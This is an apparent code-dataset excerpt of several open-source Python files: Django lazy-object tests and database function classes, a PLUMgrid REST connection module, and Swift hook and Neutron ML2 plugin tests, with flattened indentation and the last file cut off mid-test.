class TestUtilsSimpleLazyObject(TestCase):
"""
Tests for SimpleLazyObject
"""
# Note that concrete use cases for SimpleLazyObject are also found in the
# auth context processor tests (unless the implementation of that function
# is changed).
def test_equality(self):
self.assertEqual(complex_object(), SimpleLazyObject(complex_object))
self.assertEqual(SimpleLazyObject(complex_object), complex_object())
def test_hash(self):
# hash() equality would not be true for many objects, but it should be
# for _ComplexObject
self.assertEqual(hash(complex_object()),
hash(SimpleLazyObject(complex_object)))
def test_repr(self):
# For debugging, it will really confuse things if there is no clue that
# SimpleLazyObject is actually a proxy object. So we don't
# proxy __repr__
self.assertTrue("SimpleLazyObject" in repr(SimpleLazyObject(complex_object)))
def test_str(self):
self.assertEqual("I am _ComplexObject('joe')", str(SimpleLazyObject(complex_object)))
def test_unicode(self):
self.assertEqual(u"joe", unicode(SimpleLazyObject(complex_object)))
def test_class(self):
# This is important for classes that use __class__ in things like
# equality tests.
self.assertEqual(_ComplexObject, SimpleLazyObject(complex_object).__class__)
def test_deepcopy(self):
# Check that we *can* do deep copy, and that it returns the right
# objects.
# First, for an unevaluated SimpleLazyObject
s = SimpleLazyObject(complex_object)
self.assertIs(s._wrapped, empty)
s2 = copy.deepcopy(s)
# something has gone wrong if s is evaluated
self.assertIs(s._wrapped, empty)
self.assertEqual(s2, complex_object())
# Second, for an evaluated SimpleLazyObject
name = s.name # evaluate
self.assertIsNot(s._wrapped, empty)
s3 = copy.deepcopy(s)
self.assertEqual(s3, complex_object())
def test_none(self):
i = [0]
def f():
i[0] += 1
return None
x = SimpleLazyObject(f)
self.assertEqual(str(x), "None")
self.assertEqual(i, [1])
self.assertEqual(str(x), "None")
self.assertEqual(i, [1])
def test_bool(self):
x = SimpleLazyObject(lambda: 3)
self.assertTrue(x)
x = SimpleLazyObject(lambda: 0)
self.assertFalse(x)
def test_pickle_complex(self):
# See ticket #16563
x = SimpleLazyObject(complex_object)
pickled = pickle.dumps(x)
unpickled = pickle.loads(pickled)
self.assertEqual(unpickled, x)
self.assertEqual(unicode(unpickled), unicode(x))
self.assertEqual(unpickled.name, x.name)
| bsd-3-clause |
ClovisIRex/Snake-django | env/lib/python3.6/site-packages/django/db/models/functions/base.py | 44 | 8087 | """
Classes that represent database functions.
"""
from django.db.models import Func, Transform, Value, fields
class Cast(Func):
"""
Coerce an expression to a new field type.
"""
function = 'CAST'
template = '%(function)s(%(expressions)s AS %(db_type)s)'
mysql_types = {
fields.CharField: 'char',
fields.IntegerField: 'signed integer',
fields.FloatField: 'signed',
}
def __init__(self, expression, output_field):
super(Cast, self).__init__(expression, output_field=output_field)
def as_sql(self, compiler, connection, **extra_context):
if 'db_type' not in extra_context:
extra_context['db_type'] = self._output_field.db_type(connection)
return super(Cast, self).as_sql(compiler, connection, **extra_context)
def as_mysql(self, compiler, connection):
extra_context = {}
output_field_class = type(self._output_field)
if output_field_class in self.mysql_types:
extra_context['db_type'] = self.mysql_types[output_field_class]
return self.as_sql(compiler, connection, **extra_context)
def as_postgresql(self, compiler, connection):
# CAST would be valid too, but the :: shortcut syntax is more readable.
return self.as_sql(compiler, connection, template='%(expressions)s::%(db_type)s')
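# Usage sketch (the model and field names are illustrative):
#
#     from django.db.models import FloatField
#     from django.db.models.functions import Cast
#     Author.objects.annotate(age_float=Cast('age', FloatField()))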
class Coalesce(Func):
"""
Chooses, from left to right, the first non-null expression and returns it.
"""
function = 'COALESCE'
def __init__(self, *expressions, **extra):
if len(expressions) < 2:
raise ValueError('Coalesce must take at least two expressions')
super(Coalesce, self).__init__(*expressions, **extra)
def as_oracle(self, compiler, connection):
# we can't mix TextField (NCLOB) and CharField (NVARCHAR), so convert
# all fields to NCLOB when we expect NCLOB
if self.output_field.get_internal_type() == 'TextField':
class ToNCLOB(Func):
function = 'TO_NCLOB'
expressions = [
ToNCLOB(expression) for expression in self.get_source_expressions()]
clone = self.copy()
clone.set_source_expressions(expressions)
return super(Coalesce, clone).as_sql(compiler, connection)
return self.as_sql(compiler, connection)
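# Usage sketch (the model and field names are illustrative):
#
#     from django.db.models import Value
#     from django.db.models.functions import Coalesce
#     Author.objects.annotate(
#         display=Coalesce('nickname', 'name', Value('anonymous')))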
class ConcatPair(Func):
"""
A helper class that concatenates two arguments together. This is used
by `Concat` because not all backend databases support more than two
arguments.
"""
function = 'CONCAT'
def __init__(self, left, right, **extra):
super(ConcatPair, self).__init__(left, right, **extra)
def as_sqlite(self, compiler, connection):
coalesced = self.coalesce()
return super(ConcatPair, coalesced).as_sql(
compiler, connection, template='%(expressions)s', arg_joiner=' || '
)
def as_mysql(self, compiler, connection):
# Use CONCAT_WS with an empty separator so that NULLs are ignored.
return super(ConcatPair, self).as_sql(
compiler, connection, function='CONCAT_WS', template="%(function)s('', %(expressions)s)"
)
def coalesce(self):
# a null on either side results in null for the expression, so wrap
# each side with coalesce
c = self.copy()
expressions = [
Coalesce(expression, Value('')) for expression in c.get_source_expressions()
]
c.set_source_expressions(expressions)
return c
class Concat(Func):
"""
Concatenates text fields together. Backends that result in an entire
null expression when any arguments are null will wrap each argument in
coalesce functions to ensure we always get a non-null result.
"""
function = None
template = "%(expressions)s"
def __init__(self, *expressions, **extra):
if len(expressions) < 2:
raise ValueError('Concat must take at least two expressions')
paired = self._paired(expressions)
super(Concat, self).__init__(paired, **extra)
def _paired(self, expressions):
# wrap pairs of expressions in successive concat functions
# exp = [a, b, c, d]
# -> ConcatPair(a, ConcatPair(b, ConcatPair(c, d))))
if len(expressions) == 2:
return ConcatPair(*expressions)
return ConcatPair(expressions[0], self._paired(expressions[1:]))
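# Usage sketch (the model and field names are illustrative):
#
#     from django.db.models import Value
#     from django.db.models.functions import Concat
#     Author.objects.annotate(
#         full_name=Concat('first_name', Value(' '), 'last_name'))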
class Greatest(Func):
"""
Chooses the maximum expression and returns it.
If any expression is null the return value is database-specific:
On Postgres, the maximum not-null expression is returned.
On MySQL, Oracle, and SQLite, if any expression is null, null is returned.
"""
function = 'GREATEST'
def __init__(self, *expressions, **extra):
if len(expressions) < 2:
raise ValueError('Greatest must take at least two expressions')
super(Greatest, self).__init__(*expressions, **extra)
def as_sqlite(self, compiler, connection):
"""Use the MAX function on SQLite."""
return super(Greatest, self).as_sql(compiler, connection, function='MAX')
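# Usage sketch (the model and field names are illustrative); Least below
# works the same way but returns the minimum:
#
#     from django.db.models.functions import Greatest
#     Blog.objects.annotate(last_activity=Greatest('modified', 'commented'))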
class Least(Func):
"""
Chooses the minimum expression and returns it.
If any expression is null the return value is database-specific:
On Postgres, the minimum not-null expression is returned.
On MySQL, Oracle, and SQLite, if any expression is null, null is returned.
"""
function = 'LEAST'
def __init__(self, *expressions, **extra):
if len(expressions) < 2:
raise ValueError('Least must take at least two expressions')
super(Least, self).__init__(*expressions, **extra)
def as_sqlite(self, compiler, connection):
"""Use the MIN function on SQLite."""
return super(Least, self).as_sql(compiler, connection, function='MIN')
class Length(Transform):
"""Returns the number of characters in the expression"""
function = 'LENGTH'
lookup_name = 'length'
def __init__(self, expression, **extra):
output_field = extra.pop('output_field', fields.IntegerField())
super(Length, self).__init__(expression, output_field=output_field, **extra)
def as_mysql(self, compiler, connection):
return super(Length, self).as_sql(compiler, connection, function='CHAR_LENGTH')
class Lower(Transform):
function = 'LOWER'
lookup_name = 'lower'
class Now(Func):
template = 'CURRENT_TIMESTAMP'
def __init__(self, output_field=None, **extra):
if output_field is None:
output_field = fields.DateTimeField()
super(Now, self).__init__(output_field=output_field, **extra)
def as_postgresql(self, compiler, connection):
# Postgres' CURRENT_TIMESTAMP means "the time at the start of the
# transaction". We use STATEMENT_TIMESTAMP to be cross-compatible with
# other databases.
return self.as_sql(compiler, connection, template='STATEMENT_TIMESTAMP()')
class Substr(Func):
function = 'SUBSTRING'
def __init__(self, expression, pos, length=None, **extra):
"""
expression: the name of a field, or an expression returning a string
pos: an integer > 0, or an expression returning an integer
length: an optional number of characters to return
"""
if not hasattr(pos, 'resolve_expression'):
if pos < 1:
raise ValueError("'pos' must be greater than 0")
pos = Value(pos)
expressions = [expression, pos]
if length is not None:
if not hasattr(length, 'resolve_expression'):
length = Value(length)
expressions.append(length)
super(Substr, self).__init__(*expressions, **extra)
def as_sqlite(self, compiler, connection):
return super(Substr, self).as_sql(compiler, connection, function='SUBSTR')
def as_oracle(self, compiler, connection):
return super(Substr, self).as_sql(compiler, connection, function='SUBSTR')
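# Usage sketch (the model and field names are illustrative):
#
#     from django.db.models.functions import Substr
#     Author.objects.annotate(initials=Substr('name', 1, 1))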
class Upper(Transform):
function = 'UPPER'
lookup_name = 'upper'
| mit |
wallnerryan/quantum_migrate | quantum/plugins/plumgrid/plumgrid_nos_plugin/rest_connection.py | 2 | 3469 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 PLUMgrid, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Edgar Magana, emagana@plumgrid.com, PLUMgrid, Inc.
# @author: Brenden Blanco, bblanco@plumgrid.com, PLUMgrid, Inc.
"""
Quantum PLUMgrid Plug-in for PLUMgrid Virtual Technology
This plugin forwards authenticated REST API calls
to the PLUMgrid Network Operating System (NOS).
"""
import httplib
import urllib2
from quantum.openstack.common import jsonutils as json
from quantum.openstack.common import log as logging
from quantum.plugins.plumgrid.common import exceptions as plum_excep
LOG = logging.getLogger(__name__)
class RestConnection(object):
"""REST Connection to PLUMgrid NOS Server."""
def __init__(self, server, port, timeout):
LOG.debug(_('QuantumPluginPLUMgrid Status: REST Connection Started'))
self.server = server
self.port = port
self.timeout = timeout
def nos_rest_conn(self, nos_url, action, data, headers):
self.nos_url = nos_url
body_data = json.dumps(data)
if not headers:
headers = {}
headers['Content-type'] = 'application/json'
headers['Accept'] = 'application/json'
LOG.debug(_("PLUMgrid_NOS_Server: %s %s %s"), self.server, self.port,
action)
conn = httplib.HTTPConnection(self.server, self.port,
timeout=self.timeout)
if conn is None:
LOG.error(_('PLUMgrid_NOS_Server: Could not establish HTTP '
'connection'))
return
try:
LOG.debug(_("PLUMgrid_NOS_Server Sending Data: %s %s %s"),
nos_url, body_data, headers)
conn.request(action, nos_url, body_data, headers)
resp = conn.getresponse()
resp_str = resp.read()
LOG.debug(_("PLUMgrid_NOS_Server Connection Data: %s, %s"),
resp, resp_str)
if resp.status is httplib.OK:
try:
respdata = json.loads(resp_str)
LOG.debug(_("PLUMgrid_NOS_Server Connection RESP: %s"),
respdata)
except ValueError:
err_message = _("PLUMgrid HTTP Connection Failed: ")
LOG.exception(err_message)
raise plum_excep.PLUMgridException(err_message)
ret = (resp.status, resp.reason, resp_str)
except urllib2.HTTPError, e:
LOG.error(_('PLUMgrid_NOS_Server: %(action)s failure, %(e)r'),
          {'action': action, 'e': e})
ret = (0, None, None)
conn.close()
LOG.debug(_("PLUMgrid_NOS_Server: status=%(status)d, "
"reason=%(reason)r, ret=%(ret)s"),
{'status': ret[0], 'reason': ret[1], 'ret': ret[2]})
return ret
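# Usage sketch (the server address, port and URL are illustrative):
#
#     rest = RestConnection('192.168.10.10', 8080, timeout=10)
#     status, reason, body = rest.nos_rest_conn('/0/connectivity/domain',
#                                               'GET', {}, None)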
| apache-2.0 |
rackerlabs/deuce | deuce/tests/test_openstack_swift_hook.py | 1 | 10337 | import falcon
import mock
import binascii
import base64
import json
import deuce
from deuce.transport.wsgi import hooks
from deuce.drivers import swift
from deuce.tests import HookTest
def before_hooks_swift(req, resp, params):
return [
hooks.OpenstackSwiftHook(req, resp, params)
]
class DummyClassObject(object):
pass
class TestOpenstackSwiftHook(HookTest):
def setUp(self):
super(TestOpenstackSwiftHook, self).setUp()
self.datacenter = 'test'
self.headers = {}
deuce.context = DummyClassObject()
deuce.context.datacenter = self.datacenter
deuce.context.project_id = self.create_project_id()
deuce.context.transaction = DummyClassObject()
deuce.context.transaction.request_id = 'openstack-hook-test'
deuce.context.openstack = DummyClassObject()
def test_is_not_swift_driver(self):
with mock.patch('deuce.storage_driver', object):
self.app_setup(before_hooks_swift)
self.simulate_get('/v1.0')
def test_is_swift_driver(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('deuce.transport.wsgi.hooks.'
'openstackswifthook.check_storage_url'
) as hook_check_storage_url:
self.app_setup(before_hooks_swift)
hook_check_storage_url.return_value = True
self.simulate_get('/v1.0')
def test_missing_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver):
self.app_setup(before_hooks_swift)
response = self.simulate_get('/v1.0', headers=self.headers)
self.assertEqual(self.srmock.status, falcon.HTTP_400)
def test_has_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('deuce.transport.wsgi.hooks.'
'openstackswifthook.decode_service_catalog'
) as decode_catalog:
decode_catalog.return_value = True
with mock.patch('deuce.transport.wsgi.hooks.'
'openstackswifthook.find_storage_url'
) as find_storage:
find_storage.return_value = 'test_url'
self.assertFalse(hasattr(deuce.context.openstack, 'swift'))
self.app_setup(before_hooks_swift)
self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertTrue(hasattr(deuce.context.openstack, 'swift'))
self.assertTrue(hasattr(deuce.context.openstack.swift,
'storage_url'))
self.assertEqual(deuce.context.openstack.swift.storage_url,
'test_url')
def test_failed_base64_decode_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.side_effect = binascii.Error('mock')
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_failed_json_decode_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = str('test-data').encode(
encoding='utf-8', errors='strict')
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_json_decode_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = json.dumps(
{'hello': 'test'}).encode(encoding='utf-8',
errors='strict')
with mock.patch('deuce.transport.wsgi.hooks.'
'openstackswifthook.find_storage_url'
) as find_storage:
find_storage.return_value = 'test_url'
self.assertFalse(hasattr(deuce.context.openstack, 'swift'))
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertTrue(hasattr(deuce.context.openstack, 'swift'))
self.assertTrue(hasattr(deuce.context.openstack.swift,
'storage_url'))
self.assertEqual(deuce.context.openstack.swift.storage_url,
'test_url')
def test_find_storage_url_invalid_service_catalog(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
json_data = json.dumps({'hello': 'test'})
byte_data = json_data.encode(encoding='utf-8', errors='strict')
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = byte_data
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_find_storage_url_invalid_service_catalog_with_access(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
test_dict = {'access': {'hello': 'test'}}
b64_decoder.return_value = json.dumps(test_dict).encode(
encoding='utf-8', errors='strict')
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_find_storage_url_no_object_store(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = json.dumps(
self.create_service_catalog(
objectStoreType='mock')).encode(
encoding='utf-8', errors='strict')
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_find_storage_url_no_endpoints(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
catalog = self.create_service_catalog(endpoints=False)
json_data = json.dumps(catalog)
byte_data = json_data.encode(encoding='utf-8', errors='strict')
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = byte_data
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_find_storage_url_no_region(self):
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
with mock.patch('base64.b64decode') as b64_decoder:
b64_decoder.return_value = json.dumps(
self.create_service_catalog(region='other')).encode(
encoding='utf-8', errors='strict')
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': 'mock'})
self.assertEqual(self.srmock.status, falcon.HTTP_412)
def test_find_storage_url_final(self):
catalog = self.create_service_catalog(region=self.datacenter,
url='test_url')
json_data = json.dumps(catalog)
utf8_data = json_data.encode(encoding='utf-8', errors='strict')
b64_data = base64.b64encode(utf8_data)
with mock.patch('deuce.storage_driver',
spec=swift.SwiftStorageDriver) as swift_driver:
self.assertFalse(hasattr(deuce.context.openstack, 'swift'))
self.app_setup(before_hooks_swift)
response = self.simulate_get(
'/v1.0',
headers={
'x-service-catalog': b64_data})
self.assertTrue(hasattr(deuce.context.openstack, 'swift'))
self.assertTrue(hasattr(deuce.context.openstack.swift,
'storage_url'))
self.assertEqual(deuce.context.openstack.swift.storage_url,
'test_url')
| apache-2.0 |
leeseulstack/openstack | neutron/tests/unit/ml2/test_ml2_plugin.py | 5 | 52265 | # Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import mock
import testtools
import uuid
import webob
from neutron.common import constants
from neutron.common import exceptions as exc
from neutron.common import utils
from neutron import context
from neutron.db import db_base_plugin_v2 as base_plugin
from neutron.db import l3_db
from neutron.extensions import external_net as external_net
from neutron.extensions import l3agentscheduler
from neutron.extensions import multiprovidernet as mpnet
from neutron.extensions import portbindings
from neutron.extensions import providernet as pnet
from neutron import manager
from neutron.plugins.common import constants as service_constants
from neutron.plugins.ml2.common import exceptions as ml2_exc
from neutron.plugins.ml2 import config
from neutron.plugins.ml2 import db as ml2_db
from neutron.plugins.ml2 import driver_api
from neutron.plugins.ml2 import driver_context
from neutron.plugins.ml2.drivers import type_vlan
from neutron.plugins.ml2 import models
from neutron.plugins.ml2 import plugin as ml2_plugin
from neutron.tests import base
from neutron.tests.unit import _test_extension_portbindings as test_bindings
from neutron.tests.unit.ml2.drivers import mechanism_logger as mech_logger
from neutron.tests.unit.ml2.drivers import mechanism_test as mech_test
from neutron.tests.unit import test_db_plugin as test_plugin
from neutron.tests.unit import test_extension_allowedaddresspairs as test_pair
from neutron.tests.unit import test_extension_extradhcpopts as test_dhcpopts
from neutron.tests.unit import test_security_groups_rpc as test_sg_rpc
config.cfg.CONF.import_opt('network_vlan_ranges',
'neutron.plugins.ml2.drivers.type_vlan',
group='ml2_type_vlan')
PLUGIN_NAME = 'neutron.plugins.ml2.plugin.Ml2Plugin'
class Ml2PluginV2TestCase(test_plugin.NeutronDbPluginV2TestCase):
_plugin_name = PLUGIN_NAME
_mechanism_drivers = ['logger', 'test']
def setUp(self):
# We need a L3 service plugin
l3_plugin = ('neutron.tests.unit.test_l3_plugin.'
'TestL3NatServicePlugin')
service_plugins = {'l3_plugin_name': l3_plugin}
# Enable the test mechanism driver to ensure that
# we can successfully call through to all mechanism
# driver apis.
config.cfg.CONF.set_override('mechanism_drivers',
self._mechanism_drivers,
group='ml2')
self.physnet = 'physnet1'
self.vlan_range = '1:100'
self.vlan_range2 = '200:300'
self.physnet2 = 'physnet2'
self.phys_vrange = ':'.join([self.physnet, self.vlan_range])
self.phys2_vrange = ':'.join([self.physnet2, self.vlan_range2])
config.cfg.CONF.set_override('network_vlan_ranges',
[self.phys_vrange, self.phys2_vrange],
group='ml2_type_vlan')
super(Ml2PluginV2TestCase, self).setUp(PLUGIN_NAME,
service_plugins=service_plugins)
self.port_create_status = 'DOWN'
self.driver = ml2_plugin.Ml2Plugin()
self.context = context.get_admin_context()
class TestMl2BulkToggleWithBulkless(Ml2PluginV2TestCase):
_mechanism_drivers = ['logger', 'test', 'bulkless']
def test_bulk_disable_with_bulkless_driver(self):
self.assertTrue(self._skip_native_bulk)
class TestMl2BulkToggleWithoutBulkless(Ml2PluginV2TestCase):
_mechanism_drivers = ['logger', 'test']
def test_bulk_enabled_with_bulk_drivers(self):
self.assertFalse(self._skip_native_bulk)
class TestMl2BasicGet(test_plugin.TestBasicGet,
Ml2PluginV2TestCase):
pass
class TestMl2V2HTTPResponse(test_plugin.TestV2HTTPResponse,
Ml2PluginV2TestCase):
pass
class TestMl2NetworksV2(test_plugin.TestNetworksV2,
Ml2PluginV2TestCase):
pass
class TestMl2SubnetsV2(test_plugin.TestSubnetsV2,
Ml2PluginV2TestCase):
pass
class TestMl2PortsV2(test_plugin.TestPortsV2, Ml2PluginV2TestCase):
def test_update_port_status_build(self):
with self.port() as port:
self.assertEqual('DOWN', port['port']['status'])
self.assertEqual('DOWN', self.port_create_status)
def test_update_non_existent_port(self):
ctx = context.get_admin_context()
plugin = manager.NeutronManager.get_plugin()
data = {'port': {'admin_state_up': False}}
self.assertRaises(exc.PortNotFound, plugin.update_port, ctx,
'invalid-uuid', data)
def test_delete_non_existent_port(self):
ctx = context.get_admin_context()
plugin = manager.NeutronManager.get_plugin()
with mock.patch.object(ml2_plugin.LOG, 'debug') as log_debug:
plugin.delete_port(ctx, 'invalid-uuid', l3_port_check=False)
log_debug.assert_has_calls([
mock.call(_("Deleting port %s"), 'invalid-uuid'),
mock.call(_("The port '%s' was deleted"), 'invalid-uuid')
])
def test_l3_cleanup_on_net_delete(self):
l3plugin = manager.NeutronManager.get_service_plugins().get(
service_constants.L3_ROUTER_NAT)
kwargs = {'arg_list': (external_net.EXTERNAL,),
external_net.EXTERNAL: True}
with self.network(**kwargs) as n:
with self.subnet(network=n, cidr='200.0.0.0/22'):
l3plugin.create_floatingip(
context.get_admin_context(),
{'floatingip': {'floating_network_id': n['network']['id'],
'tenant_id': n['network']['tenant_id']}}
)
self._delete('networks', n['network']['id'])
flips = l3plugin.get_floatingips(context.get_admin_context())
self.assertFalse(flips)
def test_delete_port_no_notify_in_disassociate_floatingips(self):
ctx = context.get_admin_context()
plugin = manager.NeutronManager.get_plugin()
l3plugin = manager.NeutronManager.get_service_plugins().get(
service_constants.L3_ROUTER_NAT)
with contextlib.nested(
self.port(do_delete=False),
mock.patch.object(l3plugin, 'disassociate_floatingips'),
mock.patch.object(l3plugin, 'notify_routers_updated')
) as (port, disassociate_floatingips, notify):
port_id = port['port']['id']
plugin.delete_port(ctx, port_id)
# check that no notification was requested while under
# transaction
disassociate_floatingips.assert_has_calls([
mock.call(ctx, port_id, do_notify=False)
])
# check that notifier was still triggered
notify.assert_has_calls([
mock.call(ctx, disassociate_floatingips.return_value)
])
def test_check_if_compute_port_serviced_by_dvr(self):
self.assertTrue(utils.is_dvr_serviced('compute:None'))
def test_check_if_lbaas_vip_port_serviced_by_dvr(self):
self.assertTrue(utils.is_dvr_serviced(
constants.DEVICE_OWNER_LOADBALANCER))
def test_check_if_dhcp_port_serviced_by_dvr(self):
self.assertTrue(utils.is_dvr_serviced(constants.DEVICE_OWNER_DHCP))
def test_check_if_port_not_serviced_by_dvr(self):
self.assertFalse(utils.is_dvr_serviced(
constants.DEVICE_OWNER_ROUTER_INTF))
def test_disassociate_floatingips_do_notify_returns_nothing(self):
ctx = context.get_admin_context()
l3plugin = manager.NeutronManager.get_service_plugins().get(
service_constants.L3_ROUTER_NAT)
with self.port() as port:
port_id = port['port']['id']
# check that nothing is returned when notifications are handled
# by the called method
self.assertIsNone(l3plugin.disassociate_floatingips(ctx, port_id))
class TestMl2DvrPortsV2(TestMl2PortsV2):
def setUp(self):
super(TestMl2DvrPortsV2, self).setUp()
extensions = ['router',
constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS]
self.plugin = manager.NeutronManager.get_plugin()
self.l3plugin = mock.Mock()
type(self.l3plugin).supported_extension_aliases = (
mock.PropertyMock(return_value=extensions))
self.service_plugins = {'L3_ROUTER_NAT': self.l3plugin}
def _test_delete_dvr_serviced_port(self, device_owner, floating_ip=False):
ns_to_delete = {'host': 'myhost', 'agent_id': 'vm_l3_agent',
'router_id': 'my_router'}
fip_set = set()
if floating_ip:
fip_set.add(ns_to_delete['router_id'])
with contextlib.nested(
mock.patch.object(manager.NeutronManager,
'get_service_plugins',
return_value=self.service_plugins),
self.port(do_delete=False,
device_owner=device_owner),
mock.patch.object(self.l3plugin, 'notify_routers_updated'),
mock.patch.object(self.l3plugin, 'disassociate_floatingips',
return_value=fip_set),
mock.patch.object(self.l3plugin, 'dvr_deletens_if_no_port',
return_value=[ns_to_delete]),
mock.patch.object(self.l3plugin, 'remove_router_from_l3_agent')
) as (get_service_plugin, port, notify, disassociate_floatingips,
dvr_delns_ifno_port, remove_router_from_l3_agent):
port_id = port['port']['id']
self.plugin.delete_port(self.context, port_id)
notify.assert_has_calls([mock.call(self.context, fip_set)])
dvr_delns_ifno_port.assert_called_once_with(self.context,
port['port']['id'])
remove_router_from_l3_agent.assert_has_calls([
mock.call(self.context, ns_to_delete['agent_id'],
ns_to_delete['router_id'])
])
def test_delete_last_vm_port(self):
self._test_delete_dvr_serviced_port(device_owner='compute:None')
def test_delete_last_vm_port_with_floatingip(self):
self._test_delete_dvr_serviced_port(device_owner='compute:None',
floating_ip=True)
def test_delete_vm_port_namespace_already_deleted(self):
ns_to_delete = {'host': 'myhost',
'agent_id': 'vm_l3_agent',
'router_id': 'my_router'}
with contextlib.nested(
mock.patch.object(manager.NeutronManager,
'get_service_plugins',
return_value=self.service_plugins),
self.port(do_delete=False,
device_owner='compute:None'),
mock.patch.object(self.l3plugin, 'dvr_deletens_if_no_port',
return_value=[ns_to_delete]),
mock.patch.object(self.l3plugin, 'remove_router_from_l3_agent',
side_effect=l3agentscheduler.RouterNotHostedByL3Agent(
router_id=ns_to_delete['router_id'],
agent_id=ns_to_delete['agent_id']))
) as (get_service_plugin, port, dvr_delns_ifno_port,
remove_router_from_l3_agent):
self.plugin.delete_port(self.context, port['port']['id'])
remove_router_from_l3_agent.assert_called_once_with(self.context,
ns_to_delete['agent_id'], ns_to_delete['router_id'])
def test_delete_lbaas_vip_port(self):
self._test_delete_dvr_serviced_port(
device_owner=constants.DEVICE_OWNER_LOADBALANCER)
def test_concurrent_csnat_port_delete(self):
plugin = manager.NeutronManager.get_service_plugins()[
service_constants.L3_ROUTER_NAT]
r = plugin.create_router(
self.context,
{'router': {'name': 'router', 'admin_state_up': True}})
with self.subnet() as s:
p = plugin.add_router_interface(self.context, r['id'],
{'subnet_id': s['subnet']['id']})
# lie to turn the port into an SNAT interface
with self.context.session.begin():
rp = self.context.session.query(l3_db.RouterPort).filter_by(
port_id=p['port_id']).first()
rp.port_type = constants.DEVICE_OWNER_ROUTER_SNAT
# take the port away before csnat gets a chance to delete it
# to simulate a concurrent delete
orig_get_ports = plugin._core_plugin.get_ports
def get_ports_with_delete_first(*args, **kwargs):
plugin._core_plugin.delete_port(self.context,
p['port_id'],
l3_port_check=False)
return orig_get_ports(*args, **kwargs)
plugin._core_plugin.get_ports = get_ports_with_delete_first
# This should be able to handle a concurrent delete without raising
# an exception
router = plugin._get_router(self.context, r['id'])
plugin.delete_csnat_router_interface_ports(self.context, router)
class TestMl2PortBinding(Ml2PluginV2TestCase,
test_bindings.PortBindingsTestCase):
# Test case does not set binding:host_id, so ml2 does not attempt
# to bind port
VIF_TYPE = portbindings.VIF_TYPE_UNBOUND
HAS_PORT_FILTER = False
ENABLE_SG = True
FIREWALL_DRIVER = test_sg_rpc.FIREWALL_HYBRID_DRIVER
def setUp(self, firewall_driver=None):
test_sg_rpc.set_firewall_driver(self.FIREWALL_DRIVER)
config.cfg.CONF.set_override(
'enable_security_group', self.ENABLE_SG,
group='SECURITYGROUP')
super(TestMl2PortBinding, self).setUp()
def _check_port_binding_profile(self, port, profile=None):
self.assertIn('id', port)
self.assertIn(portbindings.PROFILE, port)
value = port[portbindings.PROFILE]
self.assertEqual(profile or {}, value)
def test_create_port_binding_profile(self):
self._test_create_port_binding_profile({'a': 1, 'b': 2})
def test_update_port_binding_profile(self):
self._test_update_port_binding_profile({'c': 3})
def test_create_port_binding_profile_too_big(self):
s = 'x' * 5000
profile_arg = {portbindings.PROFILE: {'d': s}}
try:
with self.port(expected_res_status=400,
arg_list=(portbindings.PROFILE,),
